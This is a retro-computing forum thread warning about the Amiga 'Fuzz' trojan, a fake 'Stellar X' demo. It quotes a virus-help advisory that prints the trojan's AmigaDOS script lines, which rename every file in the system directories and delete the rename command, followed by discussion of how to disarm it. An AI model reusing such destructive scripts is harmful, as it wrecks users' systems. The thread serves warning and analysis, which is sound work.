English Amiga Board


Go Back   English Amiga Board > News

 
 
Thread Tools
Old 12 April 2020, 01:06   #1
Crashdisk
Moderator
 
Crashdisk's Avatar
 
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
Amiga Virus Warnings

This message to share with you a very recent trojan alert :
Code:
     ------------------------
     Amiga Virus Encyclopedia
     Fuzz Trojan
     
     Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE
     ------------------------------------------------------------
     
     ........................  VIRUS HELP DENMARK  ......................

     Hi All....                                             11 april 2020

     We have just recived this archive. It is said to be a demo for ECS &
     AGA machines. But if you run this demo, your Amiga system will in C:,
     S:, Devs:, L; Libs:, will be renamed
     
     We are not really sure how old this trojan are but at this time there
     is NO ANTIVIRUS program that can find it. So watch out for it.
     
     Here is some info about the trojan:
     ------------------------------------------------------
     Trojan name... : Fuzz
     Trojan file... : Many files do damage
     Trojan size... : Many files
     Trojan archive : Stellarx.lha
     Archive size.. : 444.898 bytes
     Archive info.. : 'Stellar X' Demo - ECS & AGA Machines
     ------------------------------------------------------

     There is an ReadMe.txt in the archive, with an add from a Canadian BBS,
     called 'Peace Courier Canadian HQ', saying use a 14.4 USR Dual modem.
     So we guess it must be an old trojan, there aint many BBS'es left


     The trojan bomb is named 'Stellar X Demo'. When you start the Demo, 
     it looks like this:
     Yo! Fuk-Dat-Boyee... UpTheAss
     Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
     navel creditz


     The FuZZ trojan archive contains many other files:

     BooYaKa               = Script-File
     BooYaka.info          = Icon
     ReadMe.txt            = BBS add
     DATA/Boyee            = Rename-Command
     DATA/Yo!              = Run-Command
     DATA/Fuk-Dat-Boyee... = CLI Show-Command (Picture-Shower)
     DATA/navel            = Execute-Command
     DATA/Fuk-Diz-Boyee... = Noiseplayer (Module-Player)
     DATA/Wigger!          = Soundmodule
     DATA/fuzzy            = List-Command
     DATA/creditz          = Script-File
     DATA/Dude             = Dir-Command
     DATA/BooYaKa          = Script-File
     DATA/UpTheAss         = Picture


     If you start the trojan, it executes the Script-File 'BooYaKa':

     Where you can read this in the script:
     cd data         
     execute booyaka

     This means that the trojan will execute the file
     'DATA/BooYaKa'. This file contains:

     Yo! Fuk-Dat-Boyee... UpTheAss
     Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
     navel creditz         

     Now the trojan displays the picture 'UpTheAss'.
     Then the module Wigger!.
     And executes the script-file creditz:

     fuzzy >rank s: lformat "boyee %s%s s:%s.FuZZ" navel rank
     fuzzy >rank devs: lformat "boyee %s%s devs:%s.FuZZ" navel rank
     fuzzy >rank libs: lformat "boyee %s%s libs:%s.FuZZ" navel rank
     fuzzy >rank l: lformat "boyee %s%s l:%s.FuZZ" navel rank
     fuzzy >rank fonts: lformat "boyee %s%s fonts:%s.FuZZ" navel rank
     fuzzy >rank c: lformat "boyee %s%s c:%s.FuZZ" navel rank
     delete c:rename

     Now the trojan will rename every file in:
     S:
     C:
     Fonts:
     Libs:
     L:
     Devs:
     And deletes the command c:rename

     Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE


     Regards....
          __      Jan Andersen
     __  ///      ------------
     \\\///    Virus Help Denmark 
      \XX/        www.vht-dk.dk
Source : https://www.vht-dk.dk/amiga/amiga.htm
Crashdisk is offline  
Old 12 April 2020, 12:33   #2
Foul
Registered User
 
Foul's Avatar
 
Join Date: Jun 2009
Location: Perigueux/France
Age: 49
Posts: 1,516
Send a message via ICQ to Foul Send a message via MSN to Foul
Thx for the info !
Foul is offline  
Old 12 April 2020, 13:50   #3
PDrill
Registered User
 
Join Date: Feb 2020
Location: Finland
Posts: 129
As the original message is more of an announcement than a question, I dare to write a few lines about viruses here.

I've been wondering, do you people still find viruses in your Amiga systems? I remember back in the day when we used to get games the_way_we_did, demo- and utils disc etc, at least I found a lot of them. Very ofter after trying for example a few games and booting from HD after that, VirusX told me that something (mostly Lamer Exterminator) was found in the memory.

Today we get all our 'warez' online in ADF format, and one would think they are the exact same discs than 30 years ago but during my retrosessions over the years I can't remember a single issue with viruses. Were my friends just careless (well, most likely, I was the only one doing also other things than only gaming) or is the retroscene so aware of things that stuff has been cleaned before distributing or what is the case?
PDrill is offline  
Old 12 April 2020, 14:19   #4
Gorf
Registered User
 
Gorf's Avatar
 
Join Date: May 2017
Location: Munich/Bavaria
Posts: 2,294
how can it delete "rename" after it renamed everything in c: ?
Gorf is offline  
Old 12 April 2020, 14:28   #5
ma693541
Computer Wizard
 
ma693541's Avatar
 
Join Date: Aug 2007
Location: Ramberg/Norway
Posts: 928
It can do that if the "Rename" command is resident in memory.
ma693541 is offline  
Old 12 April 2020, 14:39   #6
Crashdisk
Moderator
 
Crashdisk's Avatar
 
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
@PDrill
We are more informed today than we were back then and, more importantly, the mode of distribution has changed. Before, there was a lot of hand-to-hand exchange and that favoured the spread of viruses. Today, we have access to the same sources and in case of contamination, we warn the author to correct the problem at the root (example : Cetro del Sol).

@Gorf
This line seems misplaced as it should delete "Rename" before changing the names in folder C:
You can be malicious and stupid!
Crashdisk is offline  
Old 12 April 2020, 15:07   #7
Gorf
Registered User
 
Gorf's Avatar
 
Join Date: May 2017
Location: Munich/Bavaria
Posts: 2,294
Quote:
Originally Posted by ma693541 View Post
It can do that if the "Rename" command is resident in memory.
how so?
Gorf is offline  
Old 12 April 2020, 15:14   #8
ma693541
Computer Wizard
 
ma693541's Avatar
 
Join Date: Aug 2007
Location: Ramberg/Norway
Posts: 928
Have you never heard of a OS that have the commands resident in memory?
ma693541 is offline  
Old 12 April 2020, 15:32   #9
Gorf
Registered User
 
Gorf's Avatar
 
Join Date: May 2017
Location: Munich/Bavaria
Posts: 2,294
Quote:
Originally Posted by ma693541 View Post
Have you never heard of a OS that have the commands resident in memory?
but how would that help to delete the file "c:rename" if that file does not exist any longer?
Gorf is offline  
Old 12 April 2020, 16:24   #10
daxb
Registered User
 
Join Date: Oct 2009
Location: Germany
Posts: 3,303
The last line (delete c:rename) in the script shouldn't work, because of renaming everything in C: first.
daxb is offline  
Old 12 April 2020, 16:46   #11
andy2004
Zone Friend
 
Join Date: May 2006
Location: Hampshire
Age: 49
Posts: 271
Send a message via Yahoo to andy2004
if the scripts isnt run or executed then the trojan doesnt run.. so delete the file creditz which is the script which does the renaming or is that just to simple..
or replace the creditz file/script with a blank 0byte file called creditz. or better yet just get the whole file deleted from wherever its uploaded.
andy2004 is offline  
Old 12 April 2020, 17:06   #12
thomas
Registered User
 
thomas's Avatar
 
Join Date: Jan 2002
Location: Germany
Posts: 6,987
Quote:
Originally Posted by PDrill View Post
I've been wondering, do you people still find viruses in your Amiga systems?

Were my friends just careless

People are indeed careless. As a result every now and then a thread pops up complaining the the Amiga / Harddrive / HDF / Emulation does not boot any more or strange things happen. After investigation it turns out as an infection with a known virus. Some even infect their entire floppy collection with a boot virus, just because they don't enable the write protection.
thomas is offline  
Old 12 April 2020, 17:16   #13
Crashdisk
Moderator
 
Crashdisk's Avatar
 
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
@andy2004
yes, to avoid the malicious code, just delete the line "navel creditz" of "DATA/BooYaKa" but you would do it because you know there is a problem with this archive..
I found 3 different warez sources for this archive and I didn't search too much.
For me the biggest problem in there is that no antivirus detects this script...
Crashdisk is offline  
Old 12 April 2020, 21:25   #14
AMIGASYSTEM
Registered User
 
AMIGASYSTEM's Avatar
 
Join Date: Aug 2014
Location: Brindisi (Italy)
Age: 70
Posts: 8,248
Quote:
Originally Posted by Crashdisk View Post
@
yes, to avoid the malicious code, just delete the line "navel creditz" of "DATA/BooYaKa" but you would do it because you know there is a problem with this archive..
In the DATA folder there is also a file named "brainfile" which is actually an LHA archive that is the backup of "STELLARX.LHA", if you run it in this version there will be a graphic demo that will hide the file rename all file system with the extension .fuzz

-> Navel (camouflaged file is basically the old "Execute" from 1991)
-> fuzzy (this is also a camouflaged file is the 1991 "List" command)
-> boyee (another camouflage is the 1991 "Rename" command)

Last edited by AMIGASYSTEM; 13 April 2020 at 01:19.
AMIGASYSTEM is offline  
Old 12 April 2020, 23:11   #15
andy2004
Zone Friend
 
Join Date: May 2006
Location: Hampshire
Age: 49
Posts: 271
Send a message via Yahoo to andy2004
I would delete the line except for 1 thing.. i dont do DEMOS, never have in all the years i had an amiga.. didn't have a hdd either in my a600, and memory would have been cleaned at every reboot after inserting a new disk. Yes i looked at disc mags, games, but mainly apps.
andy2004 is offline  
Old 13 April 2020, 02:03   #16
Crashdisk
Moderator
 
Crashdisk's Avatar
 
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
Here is my list of bootblocks viruses with the detection (or not!) by the library on which the latest antivirus is based : xvs.library v33.42
Stay safe...
Attached Files
File Type: txt Bootblock_20200413.txt (27.4 KB, 262 views)
Crashdisk is offline  
Old 13 April 2020, 11:37   #17
Retro1234
Phone Homer
 
Retro1234's Avatar
 
Join Date: Jun 2006
Location: 5150
Posts: 5,773
If you worked your way through BBS collections you probably would get a virus.
Retro1234 is offline  
Old 13 April 2020, 20:32   #18
Hewitson
Registered User
 
Hewitson's Avatar
 
Join Date: Feb 2007
Location: Melbourne, Australia
Age: 41
Posts: 3,773
Quote:
Originally Posted by andy2004 View Post
memory would have been cleaned at every reboot after inserting a new disk.
A soft reboot does not clear the memory.
Hewitson is online now  
Old 13 April 2020, 22:59   #19
zipper
Registered User
 
Join Date: Mar 2004
Location: finland
Posts: 1,838
Keep pressed 10 seconds.
zipper is offline  
Old 14 April 2020, 02:37   #20
AC/DC HACKER!
Registered User
 
AC/DC HACKER!'s Avatar
 
Join Date: Aug 2016
Location: Earth
Posts: 884
Mostly I wasn't into demos either, except for games. Once extracted..I'd check the contents. Then I see rap slang or "irritated" stuff, I'd delete. But then I enjoyed checking scripts too, I checked all stuff I download..at least once. Unless I knew the source is good. Most people I knew checked stuff. But still kept VirusZ and others handy. Rarely did anything get through..."our firewall", haha.

Thanks for the tip!
AC/DC HACKER! is offline  
 


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Similar Threads
Thread Thread Starter Forum Replies Last Post
vasm treat warnings as errors? hop Coders. Asm / Hardware 3 30 April 2019 22:32
Warnings after uploading in The Zone! eLowar project.EAB 12 12 October 2007 23:10
When's the last time you had a virus on your Amiga? Paul_s Nostalgia & memories 21 31 January 2007 11:06
Virus on my Amiga Disks Andrew request.Apps 14 12 December 2004 19:18
Amiga Virus Help madduck Amiga websites reviews 1 11 September 2002 19:15

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT +2. The time now is 18:00.

Top

Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2024, vBulletin Solutions Inc.
Page generated in 0.51824 seconds with 16 queries